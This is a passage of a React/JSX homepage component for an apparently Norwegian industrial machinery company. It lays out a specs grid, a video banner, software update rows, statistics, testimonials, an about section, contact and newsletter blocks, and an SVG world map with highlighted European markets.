              { label: t.machineSpecEncryption, value: lang === 'no' ? 'Kvantum' : 'Quantum' },
              { label: t.machineSpecTdp, value: "420W" }].
              map((spec, i) =>
              <div key={spec.label} style={{ padding: "16px 20px", borderBottom: i < 2 ? "1px solid rgba(255,255,255,0.1)" : "none", borderRight: i % 2 === 0 ? "1px solid rgba(255,255,255,0.1)" : "none" }}>
                <p style={{ fontFamily: "Rajdhani, sans-serif", fontSize: "0.6rem", letterSpacing: "0.2em", textTransform: "uppercase", color: "rgba(255,255,255,0.3)", marginBottom: "4px" }}>{spec.label}</p>
                <p style={{ fontFamily: "Rajdhani, sans-serif", fontWeight: 600, fontSize: "1.1rem", color: "white", letterSpacing: "0.05em" }}>{spec.value}</p>
              </div>
              )}
            </div>

            <a href="/machines" className="text-link-arrow" style={{ color: "white" }}>{t.machineViewSpecs}</a>
          </div>
        </section>

        {/* ===== VIDEO SECTION ===== */}
        <section
          className="snap-section video-section"
          style={{
            display: "flex",
            flexDirection: "column",
            alignItems: "center",
            justifyContent: "center",
            position: "relative",
            overflow: "hidden",
            backgroundColor: "#050505",
            minHeight: "60vh"
          }}>

          {/* Background MP4 video */}
          <video
            autoPlay
            muted
            loop
            playsInline
            style={{
              position: "absolute",
              inset: 0,
              width: "100%",
              height: "100%",
              objectFit: "cover",
              zIndex: 0
            }}>
            <source src="https://videos.pexels.com/video-files/3121459/3121459-uhd_2560_1440_25fps.mp4" type="video/mp4" />
          </video>

          {/* Dark overlay */}
          <div style={{
            position: "absolute",
            inset: 0,
            background: "rgba(0,0,0,0.6)",
            zIndex: 1,
            pointerEvents: "none"
          }} />

          <div style={{ textAlign: "center", zIndex: 2, padding: "0 24px" }}>
            <p className="section-label" style={{ marginBottom: "24px" }}>{t.videoLabel}</p>
            <h2 className="video-title" style={{
              fontFamily: "Rajdhani, sans-serif",
              fontWeight: 700,
              fontSize: "clamp(2rem, 5vw, 3.5rem)",
              letterSpacing: "0.05em",
              textTransform: "uppercase",
              color: "white",
              lineHeight: 1,
              marginBottom: "16px"
            }}>
              {t.videoTitle}
            </h2>
            <p className="video-subtitle" style={{
              fontFamily: "Nunito Sans, sans-serif",
              fontWeight: 300,
              fontSize: "1rem",
              color: "rgba(255,255,255,0.75)",
              lineHeight: 1.7,
              maxWidth: "480px",
              margin: "0 auto"
            }}>
              {t.videoSubtitle}
            </p>
          </div>
        </section>

        {/* ===== SECTION 5: Software Updates ===== */}
        <section
          className="snap-section"
          style={{
            backgroundColor: "#0A0A0A",
            borderTop: "1px solid #2A2A2A",
            display: "flex",
            alignItems: "center",
            justifyContent: "center"
          }}>
          <div className="max-w-5xl mx-auto px-6 w-full py-20">
            <div className="software-header" style={{ display: "flex", justifyContent: "space-between", alignItems: "flex-end", marginBottom: "48px" }}>
              <div>
                <p className="section-label" style={{ marginBottom: "12px" }}>{t.softwareLabel}</p>
                <h2 style={{
                  fontFamily: "Rajdhani, sans-serif",
                  fontWeight: 700,
                  fontSize: "clamp(2rem, 4vw, 3rem)",
                  letterSpacing: "0.05em",
                  textTransform: "uppercase",
                  color: "white",
                  lineHeight: 1
                }}>
                  {t.softwareTitle}
                </h2>
              </div>
              <a href="/machines" className="text-link-arrow" style={{ color: "rgba(255,255,255,0.4)", fontSize: "0.75rem" }}>
                {t.softwareAllUpdates}
              </a>
            </div>
            <div style={{ display: "flex", flexDirection: "column" }}>
              {updates.map((update, i) =>
              <div key={i} className="software-row" style={{ display: "grid", gridTemplateColumns: "140px 1fr auto auto", gap: "24px", alignItems: "center", padding: "20px 0", borderBottom: "1px solid #1A1A1A" }}>
                  <p className="software-date" style={{ fontFamily: "Rajdhani, sans-serif", fontSize: "0.75rem", letterSpacing: "0.1em", color: "rgba(255,255,255,0.3)" }}>{update.date}</p>
                  <div>
                    <p style={{ fontFamily: "Rajdhani, sans-serif", fontWeight: 600, fontSize: "0.95rem", letterSpacing: "0.05em", color: "white", marginBottom: "2px" }}>{update.machine}</p>
                  </div>
                  <span className="software-version" style={{ fontFamily: "Rajdhani, sans-serif", fontSize: "0.75rem", letterSpacing: "0.1em", color: "rgba(255,255,255,0.4)", fontWeight: 600 }}>{update.version}</span>
                  <span className={`badge badge-${update.statusType}`}>{update.status}</span>
                </div>
              )}
            </div>
          </div>
        </section>

        {/* ===== NUMBERS / STATS SECTION ===== */}
        <section
          className="snap-section"
          style={{
            position: "relative",
            overflow: "hidden",
            display: "flex",
            alignItems: "center",
            justifyContent: "center"
          }}>

          {/* Background image */}
          <div style={{ position: "absolute", inset: 0, zIndex: 0 }}>
            <img
              src="https://img.rocket.new/generatedImages/rocket_gen_img_18a2b821b-1772554169431.png"
              alt="Norwegian fjord landscape"
              loading="lazy"
              className="img-fade-in"
              style={{ width: "100%", height: "100%", objectFit: "cover", objectPosition: "center", display: "block" }} />
            
            <div style={{ position: "absolute", inset: 0, background: "rgba(0,0,0,0.82)" }} />
          </div>

          <div style={{ position: "relative", zIndex: 1, textAlign: "center", padding: "0 24px", width: "100%" }}>
            <p className="section-label" style={{ marginBottom: "24px" }}>{t.numbersLabel}</p>
            <p className="numbers-big" style={{
              fontFamily: "Rajdhani, sans-serif",
              fontWeight: 700,
              fontSize: "clamp(5rem, 16vw, 14rem)",
              letterSpacing: "-0.02em",
              color: "white",
              lineHeight: 0.85,
              marginBottom: "48px"
            }}>
              15 000
            </p>
            <div
              className="numbers-stats-grid"
              style={{
                display: "grid",
                gridTemplateColumns: "repeat(4, 1fr)",
                gap: "0",
                border: "1px solid rgba(255,255,255,0.15)",
                maxWidth: "800px",
                margin: "0 auto",
                background: "rgba(0,0,0,0.4)",
                backdropFilter: "blur(8px)"
              }}>
              {[
              { value: t.aboutStatCountries, label: t.aboutStatCountriesLabel },
              { value: t.aboutStatYears, label: t.aboutStatYearsLabel },
              { value: t.aboutStatUptime, label: t.aboutStatUptimeLabel },
              { value: t.aboutStatUpdates, label: t.aboutStatUpdatesLabel }].
              map((stat, i) =>
              <div key={stat.label} style={{ padding: "20px 24px", textAlign: "center", borderRight: i < 3 ? "1px solid rgba(255,255,255,0.1)" : "none" }}>
                  <p className="numbers-stat-value" style={{ fontFamily: "Rajdhani, sans-serif", fontWeight: 700, fontSize: "1.8rem", color: "white", letterSpacing: "0.02em", marginBottom: "4px" }}>{stat.value}</p>
                  <p style={{ fontFamily: "Rajdhani, sans-serif", fontSize: "0.6rem", letterSpacing: "0.2em", textTransform: "uppercase", color: "rgba(255,255,255,0.3)" }}>{stat.label}</p>
                </div>
              )}
            </div>
          </div>
        </section>

        {/* ===== TESTIMONIALS SECTION ===== */}
        <section
          className="snap-section"
          style={{
            backgroundColor: "#0A0A0A",
            display: "flex",
            flexDirection: "column",
            alignItems: "center",
            justifyContent: "center",
            padding: "60px 24px"
          }}>

          <div style={{ maxWidth: "1100px", width: "100%", margin: "0 auto" }}>
            <div style={{ textAlign: "center", marginBottom: "64px" }}>
              <p className="section-label" style={{ marginBottom: "16px" }}>{t.testimonialsLabel}</p>
              <h2 style={{
                fontFamily: "Rajdhani, sans-serif",
                fontWeight: 700,
                fontSize: "clamp(2rem, 4vw, 3rem)",
                letterSpacing: "0.05em",
                textTransform: "uppercase",
                color: "white",
                lineHeight: 1
              }}>
                {t.testimonialsTitle}
              </h2>
            </div>

            <div className="testimonials-grid" style={{ display: "grid", gridTemplateColumns: "repeat(3, 1fr)", gap: "24px" }}>
              {testimonials.map((item, i) =>
              <div key={i} className="testimonial-card">
                  <p style={{
                  fontFamily: "Rajdhani, sans-serif",
                  fontWeight: 700,
                  fontSize: "4rem",
                  color: "rgba(255,255,255,0.15)",
                  lineHeight: 0.8,
                  marginBottom: "16px"
                }}>
                    &ldquo;
                  </p>
                  <p style={{
                  fontFamily: "Nunito Sans, sans-serif",
                  fontWeight: 300,
                  fontStyle: "italic",
                  fontSize: "0.95rem",
                  color: "rgba(255,255,255,0.7)",
                  lineHeight: 1.8,
                  marginBottom: "28px"
                }}>
                    {item.quote}
                  </p>
                  <p style={{
                  fontFamily: "Rajdhani, sans-serif",
                  fontWeight: 600,
                  fontSize: "0.85rem",
                  letterSpacing: "0.15em",
                  textTransform: "uppercase",
                  color: "white",
                  marginBottom: "4px"
                }}>
                    {item.name}
                  </p>
                  <p style={{
                  fontFamily: "Nunito Sans, sans-serif",
                  fontWeight: 300,
                  fontSize: "0.8rem",
                  color: "rgba(255,255,255,0.4)",
                  letterSpacing: "0.05em"
                }}>
                    {item.company}
                  </p>
                </div>
              )}
            </div>
          </div>
        </section>

        {/* ===== SECTION 6: About ===== */}
        <section
          id="om-oss"
          className="snap-section about-section"
          style={{ display: "grid", gridTemplateColumns: "1fr 1fr" }}>

          {/* Dark left with bg image */}
          <div
            className="about-left"
            style={{
              position: "relative",
              display: "flex",
              flexDirection: "column",
              justifyContent: "center",
              padding: "80px 60px",
              borderRight: "1px solid #2A2A2A",
              overflow: "hidden"
            }}>
            <div style={{ position: "absolute", inset: 0, zIndex: 0 }}>
              <img
                src="https://img.rocket.new/generatedImages/rocket_gen_img_169a4eb65-1772554169535.png"
                alt="Industrial machinery close up"
                loading="lazy"
                className="img-fade-in"
                style={{ width: "100%", height: "100%", objectFit: "cover", objectPosition: "center", display: "block" }} />
              
              <div style={{ position: "absolute", inset: 0, background: "rgba(0,0,0,0.75)" }} />
            </div>
            <div style={{ position: "relative", zIndex: 1 }}>
              <p className="about-big-number" style={{
                fontFamily: "Rajdhani, sans-serif",
                fontWeight: 700,
                fontSize: "clamp(5rem, 10vw, 9rem)",
                letterSpacing: "-0.02em",
                color: "white",
                lineHeight: 0.85,
                marginBottom: "40px"
              }}>
                15 000
              </p>
              <div className="about-stats-grid" style={{ display: "grid", gridTemplateColumns: "1fr 1fr", gap: "0", border: "1px solid rgba(255,255,255,0.15)" }}>
                {[
                { value: t.aboutStatCountries, label: t.aboutStatCountriesLabel },
                { value: t.aboutStatYears, label: t.aboutStatYearsLabel },
                { value: t.aboutStatUptime, label: t.aboutStatUptimeLabel },
                { value: t.aboutStatUpdates, label: t.aboutStatUpdatesLabel }].
                map((stat, i) =>
                <div key={stat.label} style={{ padding: "20px 24px", borderBottom: i < 2 ? "1px solid rgba(255,255,255,0.1)" : "none", borderRight: i % 2 === 0 ? "1px solid rgba(255,255,255,0.1)" : "none" }}>
                    <p style={{ fontFamily: "Rajdhani, sans-serif", fontWeight: 700, fontSize: "1.8rem", color: "white", letterSpacing: "0.02em", marginBottom: "4px" }}>{stat.value}</p>
                    <p style={{ fontFamily: "Rajdhani, sans-serif", fontSize: "0.6rem", letterSpacing: "0.2em", textTransform: "uppercase", color: "rgba(255,255,255,0.3)" }}>{stat.label}</p>
                  </div>
                )}
              </div>
            </div>
          </div>

          {/* Light right with bg image */}
          <div
            className="about-right"
            style={{
              position: "relative",
              display: "flex",
              flexDirection: "column",
              justifyContent: "center",
              padding: "80px 60px",
              overflow: "hidden"
            }}>
            <div style={{ position: "absolute", inset: 0, zIndex: 0 }}>
              <img
                src="https://img.rocket.new/generatedImages/rocket_gen_img_11528d9ed-1772191891968.png"
                alt="Modern Norwegian office workspace"
                loading="lazy"
                className="img-fade-in"
                style={{ width: "100%", height: "100%", objectFit: "cover", objectPosition: "center", display: "block" }} />
              
              <div style={{ position: "absolute", inset: 0, background: "rgba(255,255,255,0.88)" }} />
            </div>
            <div style={{ position: "relative", zIndex: 1 }}>
              <p className="section-label" style={{ color: "rgba(0,0,0,0.35)", marginBottom: "16px" }}>{t.aboutLabel}</p>
              <h2 style={{
                fontFamily: "Rajdhani, sans-serif",
                fontWeight: 700,
                fontSize: "clamp(1.8rem, 3vw, 2.5rem)",
                letterSpacing: "0.04em",
                textTransform: "uppercase",
                color: "#0A0A0A",
                lineHeight: 1.1,
                marginBottom: "24px"
              }}>
                {t.aboutTitle.split('\n').map((line, i) =>
                <span key={i}>{line}{i === 0 && <br />}</span>
                )}
              </h2>
              <p style={{ fontFamily: "Nunito Sans, sans-serif", fontSize: "0.95rem", color: "rgba(0,0,0,0.6)", lineHeight: 1.9, marginBottom: "32px" }}>
                {t.aboutBody1}
              </p>
              <p style={{ fontFamily: "Nunito Sans, sans-serif", fontSize: "0.9rem", color: "rgba(0,0,0,0.5)", lineHeight: 1.9, marginBottom: "40px" }}>
                {t.aboutBody2}
              </p>
              <blockquote style={{ borderLeft: "2px solid rgba(0,0,0,0.15)", paddingLeft: "24px", marginBottom: "32px" }}>
                <p style={{ fontFamily: "Nunito Sans, sans-serif", fontStyle: "italic", fontSize: "1rem", color: "rgba(0,0,0,0.7)", lineHeight: 1.7 }}>
                  {t.aboutQuote}
                </p>
              </blockquote>
              <div style={{ display: "flex", gap: "24px", alignItems: "center", flexWrap: "wrap" }}>
                <Link href="/machines" className="text-link-arrow" style={{ color: "#0A0A0A" }}>{t.aboutCatalogLink}</Link>
                <button
                  onClick={scrollToContact}
                  style={{ fontFamily: "Nunito Sans, sans-serif", fontSize: "0.8rem", letterSpacing: "0.05em", color: "rgba(0,0,0,0.5)", background: "none", border: "none", cursor: "pointer", textDecoration: "underline", padding: 0 }}>
                  
                  {t.aboutContactBtn}
                </button>
              </div>
            </div>
          </div>

          {/* Contact + Newsletter sections (non-snap) */}
          <div style={{ scrollSnapAlign: "none" }}>
            <ContactSection showToast={showToast} />
            <NewsletterSection showToast={showToast} />

            {/* ===== MAP SECTION ===== */}
            <section className="map-section" style={{
              backgroundColor: "#050505",
              borderTop: "1px solid #1A1A1A",
              padding: "100px 40px"
            }}>
              <div style={{ maxWidth: "1000px", margin: "0 auto", textAlign: "center" }}>
                <p className="section-label" style={{ marginBottom: "16px" }}>{t.mapLabel}</p>
                <h2 className="map-title" style={{
                  fontFamily: "Rajdhani, sans-serif",
                  fontWeight: 700,
                  fontSize: "clamp(2rem, 4vw, 3rem)",
                  letterSpacing: "0.05em",
                  textTransform: "uppercase",
                  color: "white",
                  lineHeight: 1,
                  marginBottom: "16px"
                }}>
                  {t.mapTitle}
                </h2>
                <p style={{
                  fontFamily: "Nunito Sans, sans-serif",
                  fontWeight: 300,
                  fontSize: "1rem",
                  color: "rgba(255,255,255,0.45)",
                  lineHeight: 1.7,
                  marginBottom: "56px",
                  maxWidth: "480px",
                  margin: "0 auto 56px"
                }}>
                  {t.mapSubtitle}
                </p>

                {/* SVG World Map */}
                <div className="map-svg-wrapper" style={{ width: "100%", maxWidth: "900px", margin: "0 auto 48px", overflow: "hidden" }}>
                  <svg
                    viewBox="0 0 1000 500"
                    width="100%"
                    style={{ display: "block", minWidth: "280px" }}
                    xmlns="http://www.w3.org/2000/svg">
                    
                    {/* Background */}
                    <rect width="1000" height="500" fill="#0A0A0A" />

                    {/* North America */}
                    <path d="M 80 80 L 200 60 L 240 80 L 260 120 L 250 160 L 220 180 L 200 220 L 180 240 L 160 230 L 140 200 L 120 180 L 100 160 L 80 140 Z" fill="#222222" className="map-country" />
                    {/* Greenland */}
                    <path d="M 200 30 L 240 20 L 260 40 L 250 60 L 220 65 L 200 55 Z" fill="#222222" className="map-country" />
                    {/* South America */}
                    <path d="M 160 260 L 200 250 L 220 280 L 230 320 L 220 370 L 200 400 L 180 390 L 165 360 L 155 320 L 150 290 Z" fill="#222222" className="map-country" />

                    {/* Europe - highlighted white */}
                    <path d="M 440 60 L 480 50 L 510 60 L 520 80 L 510 100 L 490 110 L 470 105 L 450 95 L 440 80 Z" fill="#ffffff" className="map-country" />
                    {/* UK */}
                    <path d="M 420 70 L 435 65 L 440 80 L 432 90 L 420 85 Z" fill="#ffffff" className="map-country" />
                    {/* Scandinavia - Norway highlighted */}
                    <path d="M 470 30 L 500 20 L 520 35 L 515 55 L 500 65 L 480 60 L 465 50 Z" fill="#ffffff" className="map-country" />
                    {/* Sweden/Denmark */}
                    <path d="M 490 55 L 510 50 L 515 70 L 505 80 L 490 75 Z" fill="#ffffff" className="map-country" />
                    {/* Germany/Netherlands */}
                    <path d="M 455 90 L 490 85 L 495 105 L 480 115 L 460 110 L 450 100 Z" fill="#ffffff" className="map-country" />
                    {/* France/Spain */}
                    <path d="M 430 100 L 460 95 L 465 120 L 450 135 L 425 130 L 415 115 Z" fill="#ffffff" className="map-country" />
                    {/* Italy */}
                    <path d="M 465 115 L 480 110 L 485 135 L 475 150 L 462 140 L 460 125 Z" fill="#ffffff" className="map-country" />
                    {/* Eastern Europe */}
                    <path d="M 495 80 L 540 75 L 545 100 L 530 115 L 500 110 L 492 95 Z" fill="#ffffff" className="map-country" />

                    {/* Africa */}
                    <path d="M 440 160 L 490 150 L 510 180 L 510 240 L 490 290 L 460 310 L 440 290 L 425 250 L 425 200 L 430 170 Z" fill="#222222" className="map-country" />

                    {/* Middle East */}
                    <path d="M 540 120 L 580 115 L 590 140 L 570 155 L 545 150 L 535 135 Z" fill="#222222" className="map-country" />

                    {/* Russia */}
                    <path d="M 540 30 L 700 20 L 720 50 L 700 70 L 650 75 L 580 70 L 545 55 Z" fill="#1a1a1a" className="map-country" />

                    {/* Asia */}
                    <path d="M 620 70 L 750 60 L 800 90 L 790 130 L 750 150 L 700 145 L 650 130 L 620 110 Z" fill="#222222" className="map-country" />
                    {/* India */}
                    <path d="M 640 150 L 680 145 L 690 180 L 670 210 L 645 200 L 635 175 Z" fill="#222222" className="map-country" />
                    {/* Southeast Asia */}
                    <path d="M 730 150 L 780 145 L 790 175 L 770 185 L 735 178 Z" fill="#222222" className="map-country" />
                    {/* China */}
                    <path d="M 700 80 L 780 75 L 800 110 L 780 135 L 730 140 L 700 120 Z" fill="#222222" className="map-country" />
                    {/* Japan */}
                    <path d="M 810 90 L 830 85 L 835 105 L 820 112 L 808 102 Z" fill="#222222" className="map-country" />

                    {/* Australia */}
                    <path d="M 750 300 L 820 290 L 850 320 L 840 360 L 800 375 L 755 360 L 740 330 Z" fill="#222222" className="map-country" />

                    {/* Norway marker */}
                    <circle cx="485" cy="38" r="5" fill="#ffffff" opacity="0.9" />
                    <circle cx="485" cy="38" r="10" fill="none" stroke="rgba(255,255,255,0.4)" strokeWidth="1" />

                    {/* Grid lines */}
                    <line x1="0" y1="250" x2="1000" y2="250" stroke="rgba(255,255,255,0.04)" strokeWidth="1" />
                    <line x1="500" y1="0" x2="500" y2="500" stroke="rgba(255,255,255,0.04)" strokeWidth="1" />
                  </svg>
                </div>

                {/* Country chips */}
                <div className="map-chips" style={{ display: "flex", gap: "12px", justifyContent: "center", flexWrap: "wrap" }}>
                  {["Norge", "Sverige", "Danmark", "Tyskland", "UK", "Nederland"].map((country) =>
                  <div
                    key={country}
                    style={{
                      border: "1px solid rgba(255,255,255,0.2)",
                      padding: "8px 20px",
                      display: "flex",
                      alignItems: "center",
                      gap: "8px"
                    }}>
                    
                      <div style={{ width: "6px", height: "6px", borderRadius: "50%", backgroundColor: "white" }} />
                      <span style={{
                      fontFamily: "Rajdhani, sans-serif",
                      fontWeight: 600,
                      fontSize: "0.75rem",
                      letterSpacing: "0.15em",
                      textTransform: "uppercase",
                      color: "rgba(255,255,255,0.7)"
                    }}>
                        {country}
                      </span>
                    </div>
                  )}
                </div>
              </div>
            </section>

            <Footer />
          </div>
        </section>

      </div>
    </>
  );
}